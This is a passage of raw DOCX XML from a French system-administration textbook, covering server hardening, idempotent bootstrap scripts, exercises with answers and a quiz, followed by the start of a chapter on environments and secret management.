              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Secrets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3199"/>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2617"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Coffre séparé</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IDEMPOTENCE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Propriété d'une opération qui, répétée, produit le même résultat. Un script d'amorçage doit pouvoir être relancé sans échouer ni dupliquer.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois modèles d'idempotence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Rendre les opérations idempotentes</w:t>
        <w:br/>
        <w:t>id -u deploy &amp;&gt;/dev/null || adduser --disabled-password deploy</w:t>
        <w:br/>
        <w:t>grep -q "^PermitRootLogin no" /etc/ssh/sshd_config || echo "PermitRootLogin</w:t>
        <w:br/>
        <w:t xml:space="preserve">  no" &gt;&gt; /etc/ssh/sshd_config</w:t>
        <w:br/>
        <w:t>ufw status | grep -q "22/tcp" || ufw allow 22/tcp</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CHECK-LIST D'UN SERVEUR NEUF</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Mises à jour appliquées et automatiques.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Fuseau horaire et synchronisation NTP.</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Accès SSH par clé, root interdit.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Pare-feu en refus par défaut.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Journalisation et supervision branchées.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Instantané ou image de référence conservée.</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système minimal réduit la surface d'attaque.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apt full-upgrade</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> peut modifier des dépendances, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>apt upgrade</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> non.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dépôt tiers est une décision de sécurité.</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L'épinglage protège une version, au prix des correctifs.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SSH par clé, sans root, testé avant déconnexion.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pare-feu refuse par défaut et n'ouvre que le nécessaire.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script d'amorçage doit être idempotent.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Ce qui est fait à la main n'est pas reproductible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La machine est prête. Le chapitre suivant la met en réseau : modèles, adressage et routage.</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52.1 — Écrire un script d'amorçage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Préparez un script réutilisable pour trois serveurs.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Mise à jour et paquets de base.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Utilisateur et clé SSH.</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Pare-feu et vérifications.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 52.2 — Réduire une surface d'attaque</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   SÉCURITÉ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un serveur exécute un serveur web, une base et une tâche planifiée.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Listez les services actifs.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Désactivez ce qui est inutile.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les ports ouverts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 52.3 — Gérer une mise à jour risquée</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   EXPLOITATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une mise à jour de Nginx casse la configuration.</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Sauvegardez la configuration.</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Épinglez la version précédente.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Préparez un retour arrière.</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52.1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#!/usr/bin/env bash</w:t>
        <w:br/>
        <w:t>set -euo pipefail</w:t>
        <w:br/>
        <w:t>export DEBIAN_FRONTEND=noninteractive</w:t>
        <w:br/>
        <w:br/>
        <w:t>apt update &amp;&amp; apt upgrade -y</w:t>
        <w:br/>
        <w:t>apt install -y curl chrony ufw fail2ban</w:t>
        <w:br/>
        <w:br/>
        <w:t>timedatectl set-timezone Africa/Porto-Benin 2&gt;/dev/null || true</w:t>
        <w:br/>
        <w:t>systemctl enable --now chrony</w:t>
        <w:br/>
        <w:br/>
        <w:t>id -u deploy &amp;&gt;/dev/null || adduser --disabled-password --gecos "" deploy</w:t>
        <w:br/>
        <w:t>usermod -aG sudo deploy</w:t>
        <w:br/>
        <w:br/>
        <w:t>ufw --force enable</w:t>
        <w:br/>
        <w:t>ufw allow 22/tcp</w:t>
        <w:br/>
        <w:br/>
        <w:t>sshd -t</w:t>
        <w:br/>
        <w:t>systemctl reload ssh</w:t>
        <w:br/>
        <w:t>systemctl enable --now fail2ban</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le script se termine par les vérifications : une erreur de configuration SSH est détectée avant la déconnexion.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>|| true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sur le fuseau évite un échec si la valeur est inconnue, sans masquer les autres erreurs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 52.2</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systemctl list-unit-files --state=enabled</w:t>
        <w:br/>
        <w:t>ss -ltnp</w:t>
        <w:br/>
        <w:t>ufw status verbose</w:t>
        <w:br/>
        <w:br/>
        <w:t># Désactiver un service inutile</w:t>
        <w:br/>
        <w:t>systemctl disable --now cups.service</w:t>
        <w:br/>
        <w:t>systemctl mask cups.service</w:t>
        <w:br/>
        <w:br/>
        <w:t># Vérifier après redémarrage</w:t>
        <w:br/>
        <w:t>systemctl list-units --type=service --state=running</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un service activé mais inutilisé reste une surface de mise à jour et d'exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>mask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> empêche même un démarrage par dépendance, contrairement à </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>disable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 52.3</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cp -a /etc/nginx /root/nginx-$(date +%F)</w:t>
        <w:br/>
        <w:t>apt-mark hold nginx nginx-common</w:t>
        <w:br/>
        <w:br/>
        <w:t># Après analyse de la nouvelle version</w:t>
        <w:br/>
        <w:t>apt-mark unhold nginx nginx-common</w:t>
        <w:br/>
        <w:t>apt install nginx=1.24.0-1ubuntu1</w:t>
        <w:br/>
        <w:t>nginx -t || { echo "Configuration invalide"; exit 1; }</w:t>
        <w:br/>
        <w:t>systemctl reload nginx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>nginx -t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> valide la syntaxe avant tout rechargement : il évite une coupure complète.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La copie horodatée de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/etc/nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> permet de revenir à une configuration connue en quelques secondes.</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Quelle commande permet des changements de dépendances lors d'une mise à jour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apt update</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apt upgrade</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apt full-upgrade</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apt install</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 xml:space="preserve">Pourquoi désactiver </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>PermitRootLogin</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Pour accélérer SSH</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Pour supprimer un vecteur d'attaque courant</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Pour économiser la mémoire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Pour activer sudo</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 xml:space="preserve">Que fait </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>apt-mark hold</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Désinstalle un paquet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Empêche sa mise à jour</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 rend prioritaire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 télécharge</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Qu'est-ce qu'un script idempotent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Qui s'exécute vite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Qui peut être relancé sans effet supplémentaire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Qui ne fait rien</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Qui nécessite root</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 xml:space="preserve">Pourquoi tester </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sshd -t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> avant de recharger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Pour accélérer</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Pour éviter de se verrouiller hors du serveur</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Pour redémarrer</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Pour lister les clés</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C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>full-upgrade</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> peut installer ou supprimer des paquets pour satisfaire les dépendances.</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Les attaques automatisées ciblent massivement le compte root.</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Le paquet est conservé dans sa version actuelle.</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Le résultat reste identique quel que soit le nombre d'exécutions.</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Une configuration invalide empêcherait toute nouvelle connexion.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>53. Environnements, secrets et configuration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Séparer ce qui change d'un environnement à l'autre, sans jamais versionner de secret.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 2 h 45 · Niveau : Intermédiaire · Prérequis : chapitre 52</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Distinguer configuration, code et secret.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Gérer des environnements de développement, de test et de production.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Charger des variables d'environnement proprement.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Choisir un coffre de secrets adapté.</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Faire tourner un secret compromis sans interruption.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>53.1 Trois natures de données</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Tout ce qu'une application lit à l'exécution n'a pas le même statut. Confondre ces catégories conduit soit à versionner des secrets, soit à recompiler pour changer une URL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.182 — Trois natures de données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193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Nature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Exemple</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="218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Où</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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Versionné</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1932"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Fonction, requête</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2189"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Dépôt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="193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Configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Port, niveau de journal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="218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Variables, fichier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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Oui, par défaut</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1932"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Secret</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Mot de passe, clé d'API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2189"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Coffre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Jamais</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CONFIGURATION DOUZE FACTEURS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Principe issu du manifeste Twelve-Factor App : la configuration est stockée dans l'environnement, jamais dans le code, pour que le même artefact fonctionne partout.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>La configuration sort du code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Mauvais : la configuration est dans le code</w:t>
        <w:br/>
        <w:t>const api = "https://api.production.exemple.fr";</w:t>
        <w:br/>
        <w:br/>
        <w:t># Bon : la configuration vient de l'environnement</w:t>
        <w:br/>
        <w:t>const api = process.env.API_URL;</w:t>
        <w:br/>
        <w:t>if (!api) throw new Error("API_URL manquante");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>53.2 Les environnements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Chaque environnement a un rôle. Trop d'environnements coûtent cher à maintenir ; trop peu font tester en production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.183 — Quatre environnements et leur rôle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231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Environnement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="231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Données</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="167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Accès</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="270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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2318"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
